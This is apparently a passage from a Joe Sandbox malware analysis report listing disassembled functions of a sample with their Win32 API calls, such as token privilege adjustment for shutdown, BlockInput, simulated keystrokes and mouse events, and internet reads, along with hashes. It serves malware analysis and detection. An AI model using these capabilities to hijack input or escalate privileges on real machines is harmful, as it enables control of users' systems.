                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                                  • Opcode ID: 396e5d1f0e40728a7a90428a2f1d20df15f0a0624a81a073c4290c0b45cf9389
                                                                                                                                                  • Instruction ID: 04498d18d7cecb8e9e17090db2264bb641b36b661b38d4f9ca3c7dc10d6b5352
                                                                                                                                                  • Opcode Fuzzy Hash: 396e5d1f0e40728a7a90428a2f1d20df15f0a0624a81a073c4290c0b45cf9389
                                                                                                                                                  • Instruction Fuzzy Hash: 180120317F0732EAE7286265BC4BBBF7258EB05F41F200425F823E28D1D9705C409150
                                                                                                                                                  Function 00BC1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BC1DD6
                                                                                                                                                  • GetSysColor.USER32(0000000F,?,?), ref: 00BC1E2A
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00BC1E3D
                                                                                                                                                    • Part of subcall function 00BC166C: DefDlgProcW.USER32(?,00000020,?), ref: 00BC16B4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ColorProc$LongWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3744519093-0
                                                                                                                                                  • Opcode ID: 828533d3d18bf23a3954bfa0c45e42fb1ba5b7ec9ef807c41741e1925d120e14
                                                                                                                                                  • Instruction ID: 305dd4e1a3ecaf1086712f2d18ec4bdced4dd3530e3f936dd6d1dcd1025cf290
                                                                                                                                                  • Opcode Fuzzy Hash: 828533d3d18bf23a3954bfa0c45e42fb1ba5b7ec9ef807c41741e1925d120e14
                                                                                                                                                  • Instruction Fuzzy Hash: C0A10474105908BAE628AB6D8C89F7F29DDEF43301F244AAEF503F6193DA259D01D276
                                                                                                                                                  Function 00C2C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2C329
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2C359
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2C36E
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2C37F
                                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C2C3AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2387731787-0
                                                                                                                                                  • Opcode ID: 3b0cc6a5832c16a2f4240f66867d593f913572e5b27e0eeaba84119b620b7c5c
                                                                                                                                                  • Instruction ID: 8dd03b0e81183d3ed0ea2b8cb6ce5656199eca6947f5a0720cb686dcaddad557
                                                                                                                                                  • Opcode Fuzzy Hash: 3b0cc6a5832c16a2f4240f66867d593f913572e5b27e0eeaba84119b620b7c5c
                                                                                                                                                  • Instruction Fuzzy Hash: 31516C756046129FC714EF68D4D0EAEB3E4AF49320F10466DE966C7761DB30EE05CB91
                                                                                                                                                  Function 00C459B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowVisible.USER32(?,00000001), ref: 00C45A02
                                                                                                                                                  • IsWindowEnabled.USER32(?,?,00000001), ref: 00C45A10
                                                                                                                                                  • GetForegroundWindow.USER32(?,?,00000001), ref: 00C45A1D
                                                                                                                                                  • IsIconic.USER32(?,?,?,00000001), ref: 00C45A2B
                                                                                                                                                  • IsZoomed.USER32(?,?,?,?,00000001), ref: 00C45A39
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                  • Opcode ID: 0c293800313f04ba7e317f62b68bd9f37eb43456e1dfdfc4827a5ce771a03844
                                                                                                                                                  • Instruction ID: d178edfee3c7edec4f5e1d09b08d7464be6dafde6de6f817475f3921683f0432
                                                                                                                                                  • Opcode Fuzzy Hash: 0c293800313f04ba7e317f62b68bd9f37eb43456e1dfdfc4827a5ce771a03844
                                                                                                                                                  • Instruction Fuzzy Hash: 2B11C436300A11AFE7215F269C84B6E7BA9FF44761B14412DF856E7242DB30DE418AA0
                                                                                                                                                  Function 00C00030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                                  • Opcode ID: 78e1eed2f4257a2679dfa1b1e5aed754c86d3b5e1ec87972b0dbd2dcc2d2156b
                                                                                                                                                  • Instruction ID: d3f0521642fe17a5a92d768e400a2e134deb066a6036b3bc7d62da41389aaef0
                                                                                                                                                  • Opcode Fuzzy Hash: 78e1eed2f4257a2679dfa1b1e5aed754c86d3b5e1ec87972b0dbd2dcc2d2156b
                                                                                                                                                  • Instruction Fuzzy Hash: 31D01271858108EAC7149B92CD49FFA73BCAB04309F354092F546E2080D7358B88DB22
                                                                                                                                                  Function 00C329BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C31ED6,00000000), ref: 00C32AAD
                                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00C31ED6,00000000), ref: 00C32AE4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                                  • Opcode ID: 375f9d943b7525e5002309f4d2567f6ea34d7f0fd0aa6772bb07bc5c5a917e5a
                                                                                                                                                  • Instruction ID: 3ae5df949b8df1286560d06c23ef4f8970bc665cfc4f45ef10f5d5e941133e9f
                                                                                                                                                  • Opcode Fuzzy Hash: 375f9d943b7525e5002309f4d2567f6ea34d7f0fd0aa6772bb07bc5c5a917e5a
                                                                                                                                                  • Instruction Fuzzy Hash: B841A371614309BFEF20DE95CC85FBBB7ECEB40768F10406AF615A6141EB71AE41A660
                                                                                                                                                  Function 00C19399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE0FE6: std::exception::exception.LIBCMT ref: 00BE101C
                                                                                                                                                    • Part of subcall function 00BE0FE6: __CxxThrowException@8.LIBCMT ref: 00BE1031
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C193E3
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C19410
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00C1941D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1922334811-0
                                                                                                                                                  • Opcode ID: b3f772dc1589730d4f53a9091452e028892ee6bca8e9a21e56fdb02ed3cb3695
                                                                                                                                                  • Instruction ID: 366388a5a6249a455fd8c5332b5046144282034106946ce3d04b133597eb8912
                                                                                                                                                  • Opcode Fuzzy Hash: b3f772dc1589730d4f53a9091452e028892ee6bca8e9a21e56fdb02ed3cb3695
                                                                                                                                                  • Instruction Fuzzy Hash: 07119DB1414205AFD728AF54DC85EABB7F8EB44321B20856EE45A92290EB70EC81CA60
                                                                                                                                                  Function 00C242D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C242FF
                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C2433C
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C24345
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 33631002-0
                                                                                                                                                  • Opcode ID: e9993fa0067f6bce6c32dab1e090b0232d533ea2eaae3394953411a30a708099
                                                                                                                                                  • Instruction ID: cb0d98494fa8ececa63e11a88fb433aecdb288547b9192377b18081e4ddade5e
                                                                                                                                                  • Opcode Fuzzy Hash: e9993fa0067f6bce6c32dab1e090b0232d533ea2eaae3394953411a30a708099
                                                                                                                                                  • Instruction Fuzzy Hash: 441170B2900229BBE710DBA9AC44FBFB7ACEB08710F100156F914F71A1C2749A4487A5
                                                                                                                                                  Function 00C24F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C24F45
                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C24F5C
                                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00C24F6C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                                  • Opcode ID: 3c8fcf707eae2674f783f3ecc95d5051b86da996eb3ff21e6a1997e57ecc2697
                                                                                                                                                  • Instruction ID: f9049bcd3641b83f0a3da6aa85884646ceb24b0217cdb798b049832da647091d
                                                                                                                                                  • Opcode Fuzzy Hash: 3c8fcf707eae2674f783f3ecc95d5051b86da996eb3ff21e6a1997e57ecc2697
                                                                                                                                                  • Instruction Fuzzy Hash: BFF04975A1130CBFDF04DFE0DD89BAEBBBCEF08311F1044A9A902E2581E7346A448B50
                                                                                                                                                  Function 00C21AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C21B01
                                                                                                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000,?,?,00000002,?,7694C0D0,?,00008000), ref: 00C21B14
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                                  • Opcode ID: c0c3548b38472a9b2a49b58f05370031a2a1f2d3c53a8ebe369bd8669572f315
                                                                                                                                                  • Instruction ID: 4290b1445f12f68f467828a74abe851c643809e9ea3e9fe531f8e23395871592
                                                                                                                                                  • Opcode Fuzzy Hash: c0c3548b38472a9b2a49b58f05370031a2a1f2d3c53a8ebe369bd8669572f315
                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0877190020CABDB00CF94C805BBE7BB4EF18312F10804AFD55A6292E3398611DF98
                                                                                                                                                  Function 00C2A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00C39B52,?,00C5098C,?), ref: 00C2A6DA
                                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00C39B52,?,00C5098C,?), ref: 00C2A6EC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                                  • Opcode ID: 5536042d85be877d9ebe41f20fb99889917b21fb71b2d957e79ae420bfc4b44f
                                                                                                                                                  • Instruction ID: 089c7c58777ba40ff8bf2ae20ea716730ac2c85d5e49360f6a26ec906a6c772c
                                                                                                                                                  • Opcode Fuzzy Hash: 5536042d85be877d9ebe41f20fb99889917b21fb71b2d957e79ae420bfc4b44f
                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0823550432DBBDB20AFA4DC48FEA77ACBF09361F008596B918D6191D6309A40CBA1
                                                                                                                                                  Function 00C18DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C18F27), ref: 00C18DFE
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00C18F27), ref: 00C18E10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                                  • Opcode ID: 32d8cbc13f94bd32811bce75921d5d24131119c85b741e1300d4a0e2ae908546
                                                                                                                                                  • Instruction ID: e255659214f8f1e62c6d976b8a64172ac7291db6557b55c1b86554274d0affae
                                                                                                                                                  • Opcode Fuzzy Hash: 32d8cbc13f94bd32811bce75921d5d24131119c85b741e1300d4a0e2ae908546
                                                                                                                                                  • Instruction Fuzzy Hash: E9E01A35000640AEE7612B15EC08AB777A9EB003117208819F455804B1CB229CD0DB10
                                                                                                                                                  Function 00BEA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BE8F87,?,?,?,00000001), ref: 00BEA38A
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BEA393
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: da30422854984ea82efc0d56f8438e812e0c439878abbc11841d387ceff255c3
                                                                                                                                                  • Instruction ID: 112e869205bca54198589386241660bf69458484b46ae3a97244c3036e18fc71
                                                                                                                                                  • Opcode Fuzzy Hash: da30422854984ea82efc0d56f8438e812e0c439878abbc11841d387ceff255c3
                                                                                                                                                  • Instruction Fuzzy Hash: 84B09235064708ABCA402F91EC09B8C3F68EB44B63F104410F60D94070CB6254908A91
                                                                                                                                                  Function 00C345D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • BlockInput.USER32(00000001), ref: 00C345F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BlockInput
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                                  • Opcode ID: d4c934866028d8a65f10d8501424a9881613601df43d80a3aaf310d831659900
                                                                                                                                                  • Instruction ID: 653c94a33fa15997a6eac39bf99502009d091d3d18b1ddc3dd4cfab19481d474
                                                                                                                                                  • Opcode Fuzzy Hash: d4c934866028d8a65f10d8501424a9881613601df43d80a3aaf310d831659900
                                                                                                                                                  • Instruction Fuzzy Hash: 1CE01A362102199FD710AF5AE805F9AB7E8AF94760F00846AFC49D7351DA70B9818B91
                                                                                                                                                  Function 00C251E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000,00C35529), ref: 00C25205
                                                                                                                                                  Memory Dump Source
